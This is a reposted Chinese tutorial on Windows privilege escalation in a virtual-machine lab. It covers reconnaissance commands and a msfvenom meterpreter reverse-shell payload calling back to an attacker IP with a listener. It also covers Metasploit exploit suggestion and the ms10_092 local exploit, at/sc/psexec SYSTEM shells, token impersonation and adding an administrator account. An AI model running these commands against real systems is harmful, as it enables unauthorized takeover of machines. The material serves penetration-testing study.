【网络安全】--win提权

这篇具有很好参考价值的文章主要介绍了【网络安全】--win提权。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

提权目的

提高自己的执行权限,已完成更多高权限才拥有的特权

提权常用命令

whoami #查看当前用户权限

【网络安全】--win提权

systeminfo # 查看操作系统及补丁情况

【网络安全】--win提权

ipconfig #查看ip

【网络安全】--win提权

net user #查看当前用户情况

【网络安全】--win提权

netstat #查看当前网络连接情况(只有tcp)
netstat -ano #显示出tcp和udp连接情况

【网络安全】--win提权

netstat -an | find “ESTABLISHED” #查看开启状态下的网络情况

【网络安全】--win提权

tasklist #进程列表

【网络安全】--win提权

taskkill -pid xxx #停止进程
net start #启动进程
net stop #停止进程
net user best 123456 /add #添加用户名为best 密码为123456的用户
net localgroup administrators best /add #将用户名为bast的用户添加到管理组
net user best /del #删除best用户

提权实战

常见的payload利用
KB2592799
KB3000061
KB2592799
1. 安装虚拟机win2008和kali

具体安装步骤详见https://blog.csdn.net/qq_41158271/article/details/127029119?spm=1001.2014.3001.5501

【网络安全】--win提权

2. 创建普通用户

【网络安全】--win提权
【网络安全】--win提权

net user 用户名  密码 /add    #创建用户
net user #查看已有用户

【网络安全】--win提权

3. 切换用户

【网络安全】--win提权

4. kali生成木马并发送到被攻击服务器上
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=4444 -f exe>shell.exe
use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.0.107
exploit

具体使用方法详见https://blog.csdn.net/qq_41158271/article/details/130362377?spm=1001.2014.3001.5502
【网络安全】--win提权
【网络安全】--win提权

【网络安全】--win提权

5. 被攻击方运行生成的木马文件

【网络安全】--win提权
6. 查看监听是否连接成功并查看权限

【网络安全】--win提权

7. 查看可利用漏洞

方法一:

run post/multi/recon/local_exploit_suggester   #查找可识别的漏洞

【网络安全】--win提权
方法二:

run post/windows/gather/enum_patches  #查找未打补丁的漏洞

【网络安全】--win提权

方法三:

使用wes或windowsVulnscan工具对比systeminfo信息查找未打补丁的漏洞(与方法二原理一致)

下载地址:https://github.com/bitsadmin/wesng
【网络安全】--win提权
【网络安全】--win提权
【网络安全】--win提权
【网络安全】--win提权

8. 尝试利用exp提权

【网络安全】--win提权
尝试使用此漏洞提权

backgroud  #切换到后台
show sessions #查看存在的会话
search ms10_092  #查找ms10_092漏洞可利用payload
use exploit/windows/local/ms10_092_schelevator #使用payload
show options #展示设置选项
set LHOST 192.168.0.107
run #运行

【网络安全】--win提权
【网络安全】--win提权
【网络安全】--win提权
》》我这里未成功提升权限,具体步骤为上述步骤

at/sc/ps命令提权

at命令提权
at xx:xx /interactive cmd.exe  

当使用at命令设置定时计划后,执行时将会使用system权限运行,仅适用与win2007之前发布的系统
本次实验系统为win2003

【网络安全】--win提权
【网络安全】--win提权

sc命令提权
sc Create syscmd binPath = "cmd /k start" type= own type= interact #先创建服务
sc start syscmd #运行服务

适用于win7之前系统
【网络安全】--win提权

ps命令提权

前提条件:需下载PsTools

下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools

psexec.exe -accepteula -s -i -d cmd.exe
令牌窃取提权

限制条件:win2008或2003之前版本文章来源地址https://www.toymoban.com/news/detail-462264.html

use incognito
list_wokens -u
impersonate_token "NT AUTHORITY/SYSTEM" #""中为令牌号

到了这里,关于【网络安全】--win提权的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 无线网络安全之隐藏无线路由器提高安全

    无线网络越来越流行,在方便我们的同时,也给我们带来了诸多我安全隐患。为了不让没有使用权限的用户非法接入,隐藏无线路由器无疑是一个好办法。 要在空气中隐藏无线路由器最直接的方法是让它停止SSID广播,SSID广播功能将无线路由器所创建的无线网络让客户端可以

    2024年02月06日
    浏览(70)
  • 区块链技术能否提高网络安全?

    区块链技术在各大行业有着广泛的应用,其众多的用例随着技术的日益成熟而与日俱增。 越来越多的公司甚至一些政府将区块链用于日常业务运营,其原因有很多包括更快的交易处理时间,透明度提高,消除中间人等等。 对于网络安全领域,区块链技术正在创造前所未有的

    2024年02月15日
    浏览(46)
  • 2023年“楚怡杯“湖南省职业院校技能竞赛“网络安全”竞赛 B模块 Windows渗透与Linux提权

    服务器场景:Server2003 服务器场景操作系统:Windows7 nmap没扫出来,得多扫几次,这里使用masscan直接快速扫描端口。 发现一个232的tcp端口,看看是不是telnet 确实是。 FLAG: 232 FLAG: hydra -l teltest -P /usr/share/wordlists/dirb/small.txt telnet://172.16.102.248 -s 232 本题有两种做法: 1.通过使用ms_

    2024年02月04日
    浏览(50)
  • 提高公众对网络安全的认知和保护意识 - 网络安全法宣传教育

    网络安全在当今数字化时代变得越来越重要,每个人都应该对网络安全有一定的认知和保护意识。为了加强公众对网络安全的认知,我将在本文中介绍网络安全法的重要性,并提供一些实用的宣传教育措施来提高公众的网络安全意识。 网络安全法是中国政府于2016年颁布的一

    2024年02月11日
    浏览(41)
  • 如何将强化学习应用于网络安全领域,提高系统的安全性与可靠性

    作者:禅与计算机程序设计艺术

    2024年02月12日
    浏览(50)
  • 网络安全系统中的守护者:如何借助威胁情报 (TI) 提高安全性

    在这篇哈巴尔网站上的推文中,我们将解释 TI 缩写背后的含义、为什么需要它、Positive Technologies   收集哪些网络威胁数据以及如何帮助企业预防网络威胁。我们将以四种情况为例,说明公司如何使用  PT Threat Intelligence Feeds  来发现恶意活动并预防攻击。 什么是 TI 当公司建

    2024年02月15日
    浏览(39)
  • VLAN——提高网络性能、安全性和灵活性的利器

    VLAN是Virtual Local Area Network的缩写,它是一种通过网络交换机虚拟划分局域网的技术。VLAN可以将一个物理局域网划分成多个逻辑上的虚拟局域网,各个虚拟局域网之间相互独立,彼此隔离,进而提高网络性能、灵活性和安全性。本文将为大家介绍VLAN的工作原理、优点及应用场

    2024年02月07日
    浏览(47)
  • [网络安全提高篇] 一二〇.恶意软件动态分析经典沙箱Cape批量提取动态API特征

    终于忙完初稿,开心地写一篇博客。 “网络安全提高班”新的100篇文章即将开启,包括Web渗透、内网渗透、靶场搭建、CVE复现、攻击溯源、实战及CTF总结,它将更加聚焦,更加深入,也是作者的慢慢成长史。换专业确实挺难的,Web渗透也是块硬骨头,但我也试试,看看自己未

    2023年04月11日
    浏览(45)
  • [网络安全提高篇] 一一九.恶意软件动态分析经典沙箱Cape的安装和基础用法详解

    终于忙完初稿,开心地写一篇博客。 “网络安全提高班”新的100篇文章即将开启,包括Web渗透、内网渗透、靶场搭建、CVE复现、攻击溯源、实战及CTF总结,它将更加聚焦,更加深入,也是作者的慢慢成长史。换专业确实挺难的,Web渗透也是块硬骨头,但我也试试,看看自己未

    2024年02月13日
    浏览(52)
  • [网络安全提高篇] 一二二.恶意样本分类之基于API序列和机器学习的恶意家族分类详解

    终于忙完初稿,开心地写一篇博客。 “网络安全提高班”新的100篇文章即将开启,包括Web渗透、内网渗透、靶场搭建、CVE复现、攻击溯源、实战及CTF总结,它将更加聚焦,更加深入,也是作者的慢慢成长史。换专业确实挺难的,Web渗透也是块硬骨头,但我也试试,看看自己未

    2024年02月12日
    浏览(62)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包